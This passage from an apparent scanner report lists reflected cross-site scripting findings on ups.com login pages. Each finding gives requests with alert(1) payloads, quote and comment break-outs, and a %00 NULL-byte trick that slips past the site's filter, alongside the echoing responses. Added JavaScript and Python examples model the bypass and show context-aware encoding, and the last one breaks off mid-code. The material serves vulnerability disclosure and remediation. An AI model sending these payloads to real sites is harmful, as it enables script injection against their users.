The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start?loc=en_US%004d539</script><script>alert(1)</script>a033567d25f&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11332


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_4d539</script><script>alert(1)</script>a033567d25f&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_
...[SNIP]...

1.414. https://www.ups.com/account/us/start [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /account/us/start

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00a5b57'-alert(1)-'baf778aa453 was submitted in the loc parameter. This input was echoed as a5b57'-alert(1)-'baf778aa453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /account/us/start?loc=en_US%00a5b57'-alert(1)-'baf778aa453&WBPM_lid=/homepage/ct1.html_mod_qlk HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:13 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10656


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
&appid=OPENACCT';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_a5b57'-alert(1)-'baf778aa453&appid=OPENACCT';
actionUrl = "
...[SNIP]...
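The three reflection contexts in 1.412 to 1.414 (a double-quoted href attribute, a single-quoted JavaScript string, and a // comment that a </script> sequence breaks out of) each need a different encoding. The following is an added example, not code from this report or from ups.com: it renders fragments shaped like the ones the scanner reflected into, once with raw interpolation as the findings show and once with context-aware encoding, and checks structurally whether the value stayed inside its slot. The function names, the fragment layout and the sample values are assumptions made for illustration.

```javascript
// Added example (not code from this report or from ups.com): the login-page
// fragments the scanner reflected into, rendered once as the findings show
// (raw interpolation) and once with context-aware encoding. Function names,
// the fragment layout and the sample payloads are assumptions.

// Attribute context (1.405, 1.412): value inside href="...".
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// JavaScript string context inside an inline <script> (1.404, 1.414).
// JSON.stringify escapes quotes and backslashes; the second pass turns
// < > & and the JS line terminators U+2028/U+2029 into \uXXXX escapes, so the
// sequence </script> can never occur inside the script body. That is what
// stops the payload in 1.413: the HTML tokenizer ends a <script> element at
// the first </script it sees, even inside a JS string or a // comment,
// before the JavaScript parser runs at all.
function encodeForJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Shape of the live returnToField line seen in the responses.
const SCRIPT_PREFIX = 'returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + ';

// What the findings show: loc dropped straight into both contexts.
function renderLoginFragmentUnsafe(loc) {
  return [
    `<a href="/myups/forgotpassword?loc=${loc}">Forgot password</a>`,
    '<script>',
    `${SCRIPT_PREFIX}'/myups/info/home?loc=${loc}';`,
    '</script>',
  ].join('\n');
}

// Hardened rendering: encode for the slot the value lands in.
function renderLoginFragment(loc) {
  const attr = encodeForHtmlAttribute(loc);
  const js = encodeForJsString('/myups/info/home?loc=' + loc);
  return [
    `<a href="/myups/forgotpassword?loc=${attr}">Forgot password</a>`,
    '<script>',
    `${SCRIPT_PREFIX}${js};`,
    '</script>',
  ].join('\n');
}

// Index just past the closing quote of the JS string literal that starts at
// `start`, honouring backslash escapes; -1 if the literal never closes.
function endOfStringLiteral(src, start) {
  const quote = src[start];
  for (let i = start + 1; i < src.length; i++) {
    if (src[i] === '\\') { i++; continue; }
    if (src[i] === quote) return i + 1;
  }
  return -1;
}

// Structural check on a rendered fragment: the href attribute still has
// exactly its two delimiting quotes, nothing in the script line closes the
// element early, and the string literal runs all the way to the final ";".
function fragmentIsSafe(fragment) {
  const [anchor, , scriptLine] = fragment.split('\n');
  if ((anchor.match(/"/g) || []).length !== 2) return false;
  if (/<\/script/i.test(scriptLine)) return false;
  if (!scriptLine.startsWith(SCRIPT_PREFIX)) return false;
  const end = endOfStringLiteral(scriptLine, SCRIPT_PREFIX.length);
  return end !== -1 && scriptLine.slice(end) === ';';
}

// Constructed inputs shaped like the values echoed in 1.412 to 1.414.
const SAMPLE_PAYLOADS = [
  "en_US_a5b57'-alert(1)-'baf778aa453",
  'en_US_b6c8d"><script>alert(1)</script>62dcb8e5408',
  'en_US_4d539</script><script>alert(1)</script>a033567d25f',
];

for (const loc of SAMPLE_PAYLOADS) {
  console.log('raw:', fragmentIsSafe(renderLoginFragmentUnsafe(loc)),
              'encoded:', fragmentIsSafe(renderLoginFragment(loc)));
}
```

The point of the two encoders is that the same value lands in two different parsers: the attribute slot needs HTML entity encoding, and the script slot needs a JavaScript string literal in which angle brackets are escaped as well as quotes, because the HTML tokenizer looks for </script inside the script body without regard to JavaScript syntax. A single "XSS filter" that blocks a few characters cannot serve both slots, which is why the findings describe a filter being bypassed rather than an encoder failing.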

1.415. https://www.ups.com/cva [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 33597%0a293e9fe1556 was submitted in the REST URL parameter 1. This input was echoed as 33597
293e9fe1556
in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript rest-of-line comment into which our data is being copied: the injected line break ends the comment, and the text on the following line is parsed as code. The response below also shows the same line break landing inside the live, single-quoted returnToField string, where it produces an unterminated string literal rather than executable code. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva33597%0a293e9fe1556 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44320


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
d = "";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/cva33597
293e9fe1556
?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cva33597
293
...[SNIP]...

1.416. https://www.ups.com/cva [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6b82'%3bf7a06e554b0 was submitted in the REST URL parameter 1. This input was echoed as e6b82';f7a06e554b0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cvae6b82'%3bf7a06e554b0 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44337


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/cvae6b82';f7a06e554b0?appid=CVA';
actionUrl = "/one-to-one/login?ID=100
...[SNIP]...

1.417. https://www.ups.com/cva [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940e5"%20a%3db%2097335661a92 was submitted in the REST URL parameter 1. This input was echoed as 940e5" a=b 97335661a92 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. As in 1.406, the reflection point is the value attribute of a hidden input, which constrains what an injected attribute can do on its own.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva940e5"%20a%3db%2097335661a92 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/cva940e5" a=b 97335661a92?appid=CVA">
...[SNIP]...

1.418. https://www.ups.com/cva [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %001aca2</script><script>alert(1)</script>0fa99372be7 was submitted in the loc parameter. This input was echoed as 1aca2</script><script>alert(1)</script>0fa99372be7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As in 1.413, the </script> sequence is honoured by the HTML parser before JavaScript comment syntax matters, so the injected script block runs even though the reflection point is inside a // comment.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva?loc=en_US%001aca2</script><script>alert(1)</script>0fa99372be7&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2</script><script>alert(1)</script>0fa99372be7&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_1aca2
...[SNIP]...

1.419. https://www.ups.com/cva [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0094092'-alert(1)-'0ff48cd0011 was submitted in the loc parameter. This input was echoed as 94092'-alert(1)-'0ff48cd0011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva?loc=en_US%0094092'-alert(1)-'0ff48cd0011&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
d0011&appid=CVA';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_94092'-alert(1)-'0ff48cd0011&appid=CVA';
actionUrl = "/one-to-on
...[SNIP]...

1.420. https://www.ups.com/cva [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.ups.com
Path:   /cva

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd6da"><script>alert(1)</script>ed89f360e04 was submitted in the loc parameter. This input was echoed as cd6da"><script>alert(1)</script>ed89f360e04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /cva?loc=en_US%00cd6da"><script>alert(1)</script>ed89f360e04&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:11 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218


<!-- SearchBodyStart -->


<!--
Content Name: LoginCustomForSSO.jsp
-->

<!-- Begin include -->


<body onload="document.LoginPage.elements['bean.uid'].focus()"/>


<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd6da"><script>alert(1)</script>ed89f360e04&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd6da%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bed89f360e04%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...
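Added example (Python; not part of the CloudScan/Burp report and not UPS code). The issue details for 1.418 to 1.420 assert two things the report itself cannot show: that a %00 placed ahead of the blocked characters gets the payload past the filter while the page still copies the whole value, and that one loc value is reflected into three different syntactic contexts (an href attribute, a // comment and a single-quoted JavaScript string), each of which dictates a different break-out. The blocklist filter below is hypothetical, and all names (filter_blocks, page_copy, find_reflections, TOKEN, SAMPLE_BODY, SAMPLE_NEWLINE) are this example's own. The sample bodies are constructed from the response fragments the report quotes, with the script opener that the [SNIP] markers removed supplied here. find_reflections also reports the state after a line feed ends a // comment, which is the shape of the %0a REST-parameter probes later in this section.

```python
"""
Added example (not part of the report): models the two mechanisms the
'Issue detail' paragraphs describe, on bodies constructed from the quoted
response fragments. The blocklist filter is hypothetical.
"""
from urllib.parse import unquote

BLOCKED = ("<script", "</script", "alert(", "onload=")

def filter_blocks(raw_value: str) -> bool:
    """Hypothetical blocklist that, like a C-string API, inspects the decoded
    value only up to the first NUL byte."""
    visible = unquote(raw_value).split("\x00", 1)[0].lower()
    return any(tok in visible for tok in BLOCKED)

def page_copy(raw_value: str) -> str:
    """What reaches the page: the whole decoded value with the NUL dropped,
    as the report's echoes show (the '_' the app inserts is not modelled)."""
    return unquote(raw_value).replace("\x00", "")

def _js_state(script_text: str) -> str:
    """Lexical state of JavaScript at the end of script_text."""
    quote, i = None, 0
    while i < len(script_text):
        c = script_text[i]
        if quote:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"`":
            quote = c
        elif script_text.startswith("//", i):
            nl = script_text.find("\n", i)
            if nl < 0:
                return "JS rest-of-line comment"
            i = nl                          # a line feed ends the comment
        elif script_text.startswith("/*", i):
            end = script_text.find("*/", i + 2)
            if end < 0:
                return "JS block comment"
            i = end + 1
        i += 1
    return {None: "JS code", "'": "JS single-quoted string",
            '"': "JS double-quoted string", "`": "JS template literal"}[quote]

def _html_state(prefix: str) -> str:
    """Context outside <script>: a tag or attribute, a comment, or text."""
    tag_open = prefix.rfind("<")
    if tag_open >= 0 and prefix.find(">", tag_open) < 0:
        tag = prefix[tag_open:]
        if tag.count('"') % 2:
            return "HTML attribute value (double-quoted)"
        if tag.count("'") % 2:
            return "HTML attribute value (single-quoted)"
        return "inside HTML tag"
    if prefix.rfind("<!--") > prefix.rfind("-->"):
        return "HTML comment"
    return "HTML text"

def find_reflections(body: str, canary: str) -> list:
    """(offset, context) for every occurrence of canary in body. Earlier hits
    are part of the prefix, so a reflected </script> shifts the ones after it."""
    results, start = [], 0
    while True:
        idx = body.find(canary, start)
        if idx < 0:
            return results
        prefix = body[:idx]
        low = prefix.lower()
        open_at, close_at = low.rfind("<script"), low.rfind("</script")
        if open_at > close_at:                       # inside a script block
            gt = prefix.find(">", open_at)
            results.append((idx, _js_state(prefix[gt + 1:] if gt >= 0 else "")))
        else:
            results.append((idx, _html_state(prefix)))
        start = idx + len(canary)

# Constructed from the 1.418-1.420 fragments (the <script> opener that the
# report's [SNIP] cut is supplied): one probe token, three sinks.
TOKEN = "cd6da"
SAMPLE_BODY = (
    '<a href="/myups/forgotpassword?loc=en_US_' + TOKEN + '&returnto=x">\n'
    "<script>\n"
    "//actionUrl = ssoLoginUrl + \"1\" + \"&returnto=\" + '/myups/info/home?loc=en_US_" + TOKEN + "';\n"
    "returnToField = \"/myups/finishlogin?auto=1\" + \"&returnto=\" + '/myups/info/home?loc=en_US_" + TOKEN + "';\n"
    "</script>\n"
)

# Constructed from the 1.422 fragment: the %0a in the path ends the comment,
# so the suffix token sits in plain JavaScript on the next line.
SAMPLE_NEWLINE = (
    "<script>\n"
    "//actionUrl = ssoLoginUrl + \"1\" + \"&returnto=\" + 'https://www.ups.com/myWorkspace/homedd611\n"
    "13f21f4da2b\n';\n"
    "</script>\n"
)
```

Run find_reflections on the body obtained after following the redirect the report mentions, once per probe token, and keep every hit rather than the first: the three High findings for loc are one copy operation feeding three sinks. A quote that breaks the string is inert in the attribute, while the </script> payload works in every script context because the HTML parser closes the block before the JavaScript lexer sees any of it.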

1.421. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aed41"%20a%3db%20e2142496064 was submitted in the REST URL parameter 2. This input was echoed as aed41" a=b e2142496064 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homeaed41"%20a%3db%20e2142496064 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44485


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/homeaed41" a=b e2142496064">
...[SNIP]...

1.422. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.ups.com
Path:   /myWorkspace/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload dd611%0a13f21f4da2b was submitted in the REST URL parameter 2. This input was echoed as dd611, followed by a literal line feed, followed by 13f21f4da2b in the application's response.

This behaviour demonstrates that the line feed terminates the JavaScript rest-of-line comment into which our data is being copied, so that whatever follows it is parsed as JavaScript. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. One such obstacle is visible in the response below: the same line feed is also copied into the live single-quoted string assigned to returnToField, and an unescaped line break inside a JavaScript string literal is a syntax error that stops the whole script block from running.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/homedd611%0a13f21f4da2b HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:34 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44384


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611
13f21f4da2b
';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/homedd611

...[SNIP]...
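Added example (Python standing in for the JSP that renders LoginCustomForSSO.jsp; not the report's or UPS's code). It shows the per-context output encoding that neutralises every loc and REST-parameter finding above at the write site, beside an unencoded render that mirrors the quoted fragments. The template strings and the three payloads are taken from the report; the function names (encode_html_attr, encode_js_string, render_unsafe, render_safe, breaks_out) and the breaks_out check are this example's own.

```python
"""
Added example, not part of the report. Context-specific output encoding for the
three sinks the loc value is written into (double-quoted HTML attribute,
single-quoted JavaScript string, JavaScript rest-of-line comment), beside an
unencoded render that mirrors the report's response fragments.
"""
import html

# Payloads as echoed in findings 1.420, 1.419 and 1.422 of the report.
REPORT_PAYLOADS = (
    'cd6da"><script>alert(1)</script>ed89f360e04',   # closes the attribute
    "94092'-alert(1)-'0ff48cd0011",                   # closes the string
    "dd611\n13f21f4da2b",                             # ends the // comment
)

def encode_html_attr(value: str) -> str:
    """Quoted HTML attribute value: & < > " ' become entities."""
    return html.escape(value, quote=True)

def encode_js_string(value: str) -> str:
    """Inside a JS string literal: everything outside [A-Za-z0-9] becomes
    \\xHH or \\uHHHH. Quotes and line feeds cannot end the literal, and
    '</script' cannot reach the HTML parser, which runs before the JS lexer
    and closes the block regardless of the JS context it lands in."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)

def render_unsafe(loc: str) -> str:
    """Mirrors the report's fragment: the raw value goes into an href
    attribute, a // comment and a single-quoted string."""
    return (
        '<a href="/myups/forgotpassword?loc=%s">\n' % loc
        + "<script>\n"
        + "//actionUrl = ssoLoginUrl + '/myups/info/home?loc=%s';\n" % loc
        + "returnToField = '/myups/finishlogin?auto=1&returnto=' + '/myups/info/home?loc=%s';\n" % loc
        + "</script>\n"
    )

def render_safe(loc: str) -> str:
    """Hardened counterpart: each sink gets the encoder for its own context.
    The commented-out line is dropped: nothing makes a comment safe to hold
    untrusted data, so it never goes into one."""
    return (
        '<a href="/myups/forgotpassword?loc=%s">\n' % encode_html_attr(loc)
        + "<script>\n"
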